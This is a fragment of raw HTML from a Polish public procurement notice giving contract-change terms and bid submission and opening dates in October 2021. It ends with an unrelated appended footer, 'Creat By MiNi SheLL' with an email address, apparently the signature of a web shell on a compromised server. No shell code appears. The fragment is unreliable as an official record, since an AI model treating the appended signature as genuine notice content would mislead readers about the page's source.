class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> szczegółowo określa to załącznik 4 do SIWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pomocą platformy https://platformazakupowa.pl/pn/pgkimal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-01 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com